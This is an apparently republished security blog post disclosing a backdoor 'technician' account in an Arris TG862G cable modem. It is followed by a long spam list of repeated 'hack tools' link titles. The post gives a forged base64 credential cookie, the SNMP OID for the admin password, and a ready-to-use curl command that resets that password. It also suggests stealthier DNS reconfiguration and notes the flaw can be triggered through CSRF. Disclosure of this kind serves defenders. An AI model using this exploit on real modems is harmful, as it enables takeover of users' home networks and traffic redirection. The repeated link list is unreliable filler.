Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Continue reading

1. Hack Tools For Pc
2. Hacker Security Tools
3. Kik Hack Tools
4. Pentest Tools Kali Linux
5. Hacking Tools Free Download
6. Hacking Apps
7. Hack Tool Apk
8. Pentest Tools Bluekeep
9. Hacker Tools
10. Hack Tool Apk No Root
11. Hacking Tools For Windows 7
12. Hacker Tools 2020
13. Hacking App
14. Pentest Recon Tools
15. Hacker Hardware Tools
16. Hack Tools For Mac
17. Hack Tools For Pc
18. Pentest Tools Url Fuzzer
19. Hacker Search Tools
20. Hacker
21. Hackrf Tools
22. Hacking Tools Kit
23. Hacker Tools For Mac
24. Hack Tools For Pc
25. Pentest Tools Alternative
26. Hack Tools For Ubuntu
27. Pentest Tools Review
28. Computer Hacker
29. Hack Tools For Mac
30. Hack Website Online Tool
31. Hack Tools Pc
32. Pentest Box Tools Download
33. Black Hat Hacker Tools
34. Hacker Tools For Windows
35. Pentest Tools Website Vulnerability
36. Hack Tools Pc
37. Hacking Tools Download
38. Hacking Tools Github
39. Hackers Toolbox
40. Hacking Tools And Software
41. Hack Tools For Games
42. Pentest Tools Nmap
43. Pentest Tools Website
44. Pentest Tools Website
45. Pentest Tools Online
46. Hacking Tools Name
47. Hacking Tools Kit
48. Hacking Tools For Beginners
49. Hack Tools For Games
50. Hacking Tools For Beginners
51. Bluetooth Hacking Tools Kali
52. What Are Hacking Tools
53. Hack Tools For Windows
54. Pentest Tools Download
55. Termux Hacking Tools 2019
56. Tools Used For Hacking
57. Underground Hacker Sites
58. New Hack Tools
59. Pentest Tools Download
60. Pentest Tools Find Subdomains
61. Pentest Tools Tcp Port Scanner
62. Pentest Tools Find Subdomains
63. Hacker Techniques Tools And Incident Handling
64. What Are Hacking Tools
65. Pentest Tools Online
66. Hacking App
67. Tools Used For Hacking
68. Hacking Tools Software
69. What Is Hacking Tools
70. Pentest Tools Android
71. Hacking Tools For Games
72. World No 1 Hacker Software
73. Pentest Automation Tools
74. Hak5 Tools
75. Black Hat Hacker Tools
76. Hack Apps
77. Hacker Tools Github
78. Ethical Hacker Tools
79. Hacker Tools 2019
80. Pentest Tools For Ubuntu
81. Hacking Tools Windows
82. Android Hack Tools Github
83. Pentest Tools Url Fuzzer
84. Hacker Tools Apk
85. Hacking Tools For Windows Free Download
86. Hacks And Tools
87. Hacking Tools For Beginners
88. Pentest Reporting Tools
89. Nsa Hack Tools Download
90. World No 1 Hacker Software
91. Pentest Tools Android
92. Best Hacking Tools 2019
93. Hacker Search Tools
94. Bluetooth Hacking Tools Kali
95. Pentest Box Tools Download
96. Hack Tools For Mac
97. Pentest Tools Bluekeep
98. How To Hack
99. Pentest Tools Open Source
100. Hacking Tools Hardware
101. Hack Tool Apk
102. Pentest Tools Find Subdomains
103. Install Pentest Tools Ubuntu
104. Pentest Tools Online
105. Hack And Tools
106. Hacking Tools 2019
107. Pentest Tools Windows
108. Pentest Automation Tools
109. Beginner Hacker Tools
110. Hack Website Online Tool
111. Wifi Hacker Tools For Windows
112. Hack Tool Apk
113. Hacking Tools Online
114. Pentest Tools Kali Linux
115. Pentest Tools Nmap
116. Hacking Tools Windows
117. Beginner Hacker Tools
118. Hacking Tools Online
119. Android Hack Tools Github
120. Hacking Tools For Games
121. Hack Tools Download
122. Hack Tools 2019
123. Hack Rom Tools
124. Best Hacking Tools 2019
125. Hack Tools
126. Hacker Tools For Windows
127. Hacking Tools For Beginners
128. Hack App
129. Pentest Tools Download
130. Pentest Tools For Android
131. Pentest Tools Free
132. Hacking Tools And Software
133. How To Hack
134. Pentest Tools Website Vulnerability
135. Usb Pentest Tools
136. Pentest Tools Tcp Port Scanner
137. Hack Tools 2019
138. Hacker Tools Hardware
139. Nsa Hack Tools
140. Hacking Tools Free Download
141. Pentest Tools For Android
142. Nsa Hacker Tools
143. Hacker Tools 2019
144. Black Hat Hacker Tools
145. Hacker Tools For Windows
146. Hacker Tools Mac
147. Hacker Tools 2019
148. Hack Tools 2019
149. Hacker Tools Online
150. Hacking App
151. Hack Tools 2019
152. Pentest Tools Open Source
153. Pentest Tools Android
154. Pentest Tools Url Fuzzer
155. Wifi Hacker Tools For Windows
156. Hack Tools 2019
157. Hacking Tools Download
158. Hacker Security Tools
159. Hacking Tools For Games
160. New Hack Tools
161. Hack App
162. Free Pentest Tools For Windows
163. Hacking Tools And Software
164. Hack Tools Online
165. Nsa Hack Tools
166. Nsa Hack Tools
167. Pentest Tools Linux
168. Pentest Tools For Windows
169. Pentest Tools
170. Blackhat Hacker Tools
171. Best Hacking Tools 2019
172. Pentest Tools Website Vulnerability
173. Hacker Tools List
174. Pentest Recon Tools
175. Hacker Security Tools